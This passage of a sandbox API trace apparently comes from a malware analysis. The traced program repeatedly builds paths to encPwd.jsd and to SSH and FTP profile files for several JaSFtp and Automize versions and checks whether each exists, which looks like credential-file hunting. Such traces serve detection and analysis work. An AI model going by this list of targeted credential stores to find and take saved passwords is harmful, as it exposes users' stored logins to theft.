[0183.045] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.052] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 62 [0183.053] GetProcessHeap () returned 0x840000 [0183.053] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x80) returned 0x871d38 [0183.053] GetProcessHeap () returned 0x840000 [0183.053] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.054] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.054] GetProcessHeap () returned 0x840000 [0183.054] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.054] GetProcessHeap () returned 0x840000 [0183.054] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.055] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.056] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0183.056] GetProcessHeap () returned 0x840000 [0183.056] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x80) returned 0x871d38 [0183.056] GetProcessHeap () returned 0x840000 [0183.057] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.058] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.058] GetProcessHeap () returned 0x840000 [0183.058] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.058] GetProcessHeap () returned 0x840000 [0183.058] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.059] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.060] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 41 [0183.060] GetProcessHeap () returned 0x840000 [0183.060] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x56) returned 0x871d38 [0183.060] GetProcessHeap () returned 0x840000 [0183.060] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.061] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 0 [0183.062] GetProcessHeap () returned 0x840000 [0183.062] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.062] GetProcessHeap () returned 0x840000 [0183.062] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.063] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.063] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 62 [0183.064] GetProcessHeap () returned 0x840000 [0183.064] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x80) returned 0x871d38 [0183.064] GetProcessHeap () returned 0x840000 [0183.064] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.065] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.065] GetProcessHeap () returned 0x840000 [0183.065] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.065] GetProcessHeap () returned 0x840000 [0183.065] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.068] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.069] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0183.069] GetProcessHeap () returned 0x840000 [0183.069] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x80) returned 0x871d38 [0183.069] GetProcessHeap () returned 0x840000 [0183.069] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.070] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.070] GetProcessHeap () returned 0x840000 [0183.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.070] GetProcessHeap () returned 0x840000 [0183.070] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.071] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.072] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 42 [0183.072] GetProcessHeap () returned 0x840000 [0183.072] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x58) returned 0x871d38 [0183.072] GetProcessHeap () returned 0x840000 [0183.072] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.073] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 0 [0183.074] GetProcessHeap () returned 0x840000 [0183.074] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.074] GetProcessHeap () returned 0x840000 [0183.074] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.075] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.076] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 63 [0183.076] GetProcessHeap () returned 0x840000 [0183.076] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x871d38 [0183.076] GetProcessHeap () returned 0x840000 [0183.076] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.077] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.078] GetProcessHeap () returned 0x840000 [0183.078] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.078] GetProcessHeap () returned 0x840000 [0183.078] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.079] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.080] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0183.080] GetProcessHeap () returned 0x840000 [0183.080] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x871d38 [0183.080] GetProcessHeap () returned 0x840000 [0183.080] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.081] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.081] GetProcessHeap () returned 0x840000 [0183.081] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.081] GetProcessHeap () returned 0x840000 [0183.082] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.082] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.083] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 42 [0183.084] GetProcessHeap () returned 0x840000 [0183.084] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x58) returned 0x871d38 [0183.084] GetProcessHeap () returned 0x840000 [0183.084] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.085] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 0 [0183.085] GetProcessHeap () returned 0x840000 [0183.085] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.085] GetProcessHeap () returned 0x840000 [0183.086] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.086] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.087] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 63 [0183.088] GetProcessHeap () returned 0x840000 [0183.088] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x871d38 [0183.088] GetProcessHeap () returned 0x840000 [0183.088] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.104] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.104] GetProcessHeap () returned 0x840000 [0183.104] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.104] GetProcessHeap () returned 0x840000 [0183.104] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.105] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.106] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0183.106] GetProcessHeap () returned 0x840000 [0183.106] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x871d38 [0183.106] GetProcessHeap () returned 0x840000 [0183.106] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.107] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.107] GetProcessHeap () returned 0x840000 [0183.107] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.108] GetProcessHeap () returned 0x840000 [0183.108] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.108] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.109] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 42 [0183.110] GetProcessHeap () returned 0x840000 [0183.110] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x58) returned 0x871d38 [0183.110] GetProcessHeap () returned 0x840000 [0183.110] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.111] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 0 [0183.111] GetProcessHeap () returned 0x840000 [0183.111] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.111] GetProcessHeap () returned 0x840000 [0183.111] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.112] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.113] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 63 [0183.113] GetProcessHeap () returned 0x840000 [0183.113] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x871d38 [0183.115] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.116] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.117] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.118] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.119] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0183.120] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.121] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.122] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.123] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.124] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 42 [0183.125] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.125] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.126] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 0 [0183.127] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.128] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.129] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 63 [0183.130] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.131] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.132] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.133] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.134] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0183.134] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.136] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.136] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.137] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.138] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 42 [0183.139] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.194] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 0 [0183.194] GetProcessHeap () returned 0x840000 [0183.194] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.194] GetProcessHeap () returned 0x840000 [0183.194] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.195] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.196] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 63 [0183.196] GetProcessHeap () returned 0x840000 [0183.196] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x871d38 [0183.196] GetProcessHeap () returned 0x840000 [0183.196] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.197] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.197] GetProcessHeap () returned 0x840000 [0183.197] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.197] GetProcessHeap () returned 0x840000 [0183.197] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.198] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.199] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0183.199] GetProcessHeap () returned 0x840000 [0183.199] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x879248 [0183.200] GetProcessHeap () returned 0x840000 [0183.200] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.201] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.201] GetProcessHeap () returned 0x840000 [0183.201] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879248 | out: hHeap=0x840000) returned 1 [0183.201] GetProcessHeap () returned 0x840000 [0183.201] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.202] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.203] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 43 [0183.203] GetProcessHeap () returned 0x840000 [0183.203] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5a) returned 0x871d38 [0183.203] GetProcessHeap () returned 0x840000 [0183.203] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.204] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 0 [0183.205] GetProcessHeap () returned 0x840000 [0183.205] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.205] GetProcessHeap () returned 0x840000 [0183.205] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.206] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.207] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 64 [0183.207] GetProcessHeap () returned 0x840000 [0183.207] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x87a058 [0183.207] GetProcessHeap () returned 0x840000 [0183.207] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.208] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.208] GetProcessHeap () returned 0x840000 [0183.208] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a058 | out: hHeap=0x840000) returned 1 [0183.208] GetProcessHeap () returned 0x840000 [0183.208] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.209] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.210] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0183.210] GetProcessHeap () returned 0x840000 [0183.210] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x879518 [0183.210] GetProcessHeap () returned 0x840000 [0183.210] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.211] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.211] GetProcessHeap () returned 0x840000 [0183.211] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879518 | out: hHeap=0x840000) returned 1 [0183.211] GetProcessHeap () returned 0x840000 [0183.211] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.212] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.213] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 43 [0183.213] GetProcessHeap () returned 0x840000 [0183.213] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5a) returned 0x871d38 [0183.213] GetProcessHeap () returned 0x840000 [0183.213] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.214] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 0 [0183.215] GetProcessHeap () returned 0x840000 [0183.215] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.215] GetProcessHeap () returned 0x840000 [0183.215] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.216] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.224] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 64 [0183.224] GetProcessHeap () returned 0x840000 [0183.225] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x879638 [0183.225] GetProcessHeap () returned 0x840000 [0183.225] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.226] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.226] GetProcessHeap () returned 0x840000 [0183.226] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879638 | out: hHeap=0x840000) returned 1 [0183.226] GetProcessHeap () returned 0x840000 [0183.226] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.227] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.228] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0183.228] GetProcessHeap () returned 0x840000 [0183.228] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x8797e8 [0183.228] GetProcessHeap () returned 0x840000 [0183.228] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.229] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.229] GetProcessHeap () returned 0x840000 [0183.229] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8797e8 | out: hHeap=0x840000) returned 1 [0183.229] GetProcessHeap () returned 0x840000 [0183.229] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.230] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.231] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 43 [0183.231] GetProcessHeap () returned 0x840000 [0183.231] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5a) returned 0x871d38 [0183.231] GetProcessHeap () returned 0x840000 [0183.231] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.232] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 0 [0183.233] GetProcessHeap () returned 0x840000 [0183.233] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.233] GetProcessHeap () returned 0x840000 [0183.233] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.234] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.235] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 64 [0183.235] GetProcessHeap () returned 0x840000 [0183.235] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x879f38 [0183.235] GetProcessHeap () returned 0x840000 [0183.235] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.281] PathFileExistsW (pszPath="C:\\Program Files 